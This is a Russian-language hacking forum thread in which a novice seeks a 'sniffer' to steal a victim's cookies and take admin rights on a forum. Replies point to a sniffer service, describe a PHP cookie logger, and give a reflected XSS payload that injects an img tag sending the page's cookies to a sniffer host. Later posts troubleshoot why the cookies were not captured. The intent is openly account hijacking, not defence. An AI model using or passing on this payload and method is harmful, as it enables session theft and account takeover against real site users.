Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
Нубовсткий вопрос про сниферы
 
Не могу найти веб снифер, на который передадуться куки жертвы, которые впоследствии можно использовать для получение прав админа на форуме! Кто нибудь подскажет?
 
http://antichat.ru/sniff/
 
Так же в сети выложен сорец подобного - PHP sniffer. Передача параметров снифферу осуществляется через CGI-строку, расположенную после знака ?. Например: http://antichat.ru/cgi-bin/s.jpg?здесь_мои_данные

Но ты дожен помнить, что просто так куки с другого домена взять невозможно. Посредством пхп кукисы берутся из переменной $_COOKIE

Вот что получается при попытке обратиться к кукам одного домена с другого посредством JS.

Код
undefined
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.4 (build 01348))
http://localhost:8080/php1C5.tmp================================== 


Права не позволяют. Поэтому отыщи XSS на сайте жертве и работай с конструкцией вида

site/?search=<script language=javascript>document.write('<img src="http://sniffer?'+document.cookies+'" >');</script>
 
Ну этот снифер куки не передаёт, а только айпи и реферерр... Или я чё то не догоняю?
 
REFERER=http://foto.transobr.ru/
QUERY=
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; MRA 4.6 (build 01425); .NET CLR 1.1.4322)

Вот что записалось в логах, куки не передались! Почему? Кто нить может ответить? И при чём здесь Mozilla/4.0? У меня ИЕ стоит!
 
Цитата
Fiasko пишет:
куки не передались! Почему?
или их у тебя не было, или ты неправильную ссылку вставил

Цитата
Fiasko пишет:
при чём здесь Mozilla/4.0? У меня ИЕ стоит!
тык
 
Слух спасибо тебе огромное! :) Судя повсему XSS надо юзать только на тех сайтах где есть куки и где нет от него защиты! :)))) Я думал всё проще! :)
Клоуз топ
Страницы: 1
Читают тему